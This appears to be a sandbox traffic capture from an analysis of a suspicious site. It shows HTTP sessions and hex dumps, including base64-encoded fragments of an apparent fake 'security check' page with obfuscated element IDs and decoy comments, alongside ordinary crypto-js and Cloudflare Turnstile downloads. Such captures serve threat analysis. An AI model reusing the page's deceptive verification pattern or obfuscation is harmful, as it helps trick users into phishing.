                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 51 30 4b 49 30 35 69 51 32 6c 59 64 6e 56 74 55 6c 51 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 35 69 51 32 6c 59 64 6e 56 74 55 6c 51 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 54 6d 4a 44 61 56 68 32 64 57 31 53 56 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 35 69 51 32 6c 59 64 6e 56 74 55 6c 51 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70
                                                                                                                                                                                                                                                                                      Data Ascii: Q0KI05iQ2lYdnVtUlQgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI05iQ2lYdnVtUlQgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojTmJDaVh2dW1SVCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI05iQ2lYdnVtUlQuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRp
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 77 67 4d 54 41 77 4d 43 6b 37 44 51 6f 67 49 43 41 67 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 38 49 53 30 74 49 46 52 6f 5a 53 42 7a 5a 57 4e 79 5a 58 51 67 62 32 59 67 63 33 56 6a 59 32 56 7a 63 79 42 70 63 79 42 30 62 79 42 6b 62 79 42 30 61 47 55 67 59 32 39 74 62 57 39 75 49 48 52 6f 61 57 35 6e 49 48 56 75 59 32 39 74 62 57 39 75 62 48 6b 67 64 32 56 73 62 43 34 67 4c 53 30 2b 43 6a 77 76 61 47 56 68 5a 44 34 4e 43 67 30 4b 50 47 4a 76 5a 48 6b 67 63 33 52 35 62 47 55 39 49 6d 5a 76 62 6e 51 74 5a 6d 46 74 61 57 78 35 4f 69 42 68 63 6d 6c 68 62 43 77 67 63 32 46 75 63 79 31 7a 5a 58 4a 70 5a 6a 74 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 4f 32 4e 76 62
                                                                                                                                                                                                                                                                                      Data Ascii: 93KCk7DQogICAgfSwgMTAwMCk7DQogICAgPC9zY3JpcHQ+DQo8IS0tIFRoZSBzZWNyZXQgb2Ygc3VjY2VzcyBpcyB0byBkbyB0aGUgY29tbW9uIHRoaW5nIHVuY29tbW9ubHkgd2VsbC4gLS0+CjwvaGVhZD4NCg0KPGJvZHkgc3R5bGU9ImZvbnQtZmFtaWx5OiBhcmlhbCwgc2Fucy1zZXJpZjtiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmO2Nvb
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6b 4a 35 57 45 74 79 54 46 5a 74 55 6c 6f 69 50 67 30 4b 51 32 46 79 63 6e 6c 70 62 6d 63 67 62 33 56 30 49 48 4e 6c 59 33 56 79 61 58 52 35 49 47 4e 6f 5a 57 4e 72 63 79 42 76 62 69 42 35 62 33 56 79 49 47 4a 79 62 33 64 7a 5a 58 49 67 5a 6d 39 79 49 48 4e 68 5a 6d 56 30 65 53 34 4e 43 6a 77 68 4c 53 30 67 54 33 42 77 62 33 4a 30 64 57 35 70 64 47 6c 6c 63 79 42 6b 62 32 34 6d 49 7a 41 7a 4f 54 74 30 49 47 68 68 63 48 42 6c 62 69 77 67 65 57 39 31 49 47 4e 79 5a 57 46 30 5a 53 42 30 61 47 56 74 4c 69
                                                                                                                                                                                                                                                                                      Data Ascii: 0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9IkJ5WEtyTFZtUloiPg0KQ2Fycnlpbmcgb3V0IHNlY3VyaXR5IGNoZWNrcyBvbiB5b3VyIGJyb3dzZXIgZm9yIHNhZmV0eS4NCjwhLS0gT3Bwb3J0dW5pdGllcyBkb24mIzAzOTt0IGhhcHBlbiwgeW91IGNyZWF0ZSB0aGVtLi


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      3192.168.2.1649715184.28.90.27443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                      Server: ECAcc (lpl/EF45)
                                                                                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=239997
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:45 GMT
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-CID: 2


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      4192.168.2.1649717104.17.24.144436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                      Referer: https://fkmd.lioninkey.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC951INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:45 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                                      ETag: W/"61182885-40eb"
                                                                                                                                                                                                                                                                                      Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                                                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                      Age: 98880
                                                                                                                                                                                                                                                                                      Expires: Tue, 14 Oct 2025 22:05:45 GMT
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yaLLJyAwpnptFdN3b0qJUBNon4aPOM5j6lv7WFOpXAcJHuQDrlWoP6Oysl7rCu7UyQmFOuTPHq6uPNnj9CgccYyvLKRP8ah8y60TgjZgNAgmnjlRx82Z0OvAQPR59wVlTZK0Cc1y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d4529ffd36c7f-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC418INData Raw: 37 62 66 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                                                                                      Data Ascii: 7bfa!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e
                                                                                                                                                                                                                                                                                      Data Ascii: This&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||fun
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74
                                                                                                                                                                                                                                                                                      Data Ascii: s);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{ret
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68
                                                                                                                                                                                                                                                                                      Data Ascii: (t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)th
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30
                                                                                                                                                                                                                                                                                      Data Ascii: is._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c
                                                                                                                                                                                                                                                                                      Data Ascii: r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                      Data Ascii: Offset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58
                                                                                                                                                                                                                                                                                      Data Ascii: );return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWX
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC1369INData Raw: 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e
                                                                                                                                                                                                                                                                                      Data Ascii: 1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC1369INData Raw: 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d
                                                                                                                                                                                                                                                                                      Data Ascii: b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      5192.168.2.1649718104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                      Referer: https://fkmd.lioninkey.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC386INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:45 GMT
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                      location: /turnstile/v0/b/e1a56f38220d/api.js
                                                                                                                                                                                                                                                                                      Server: cloudflare
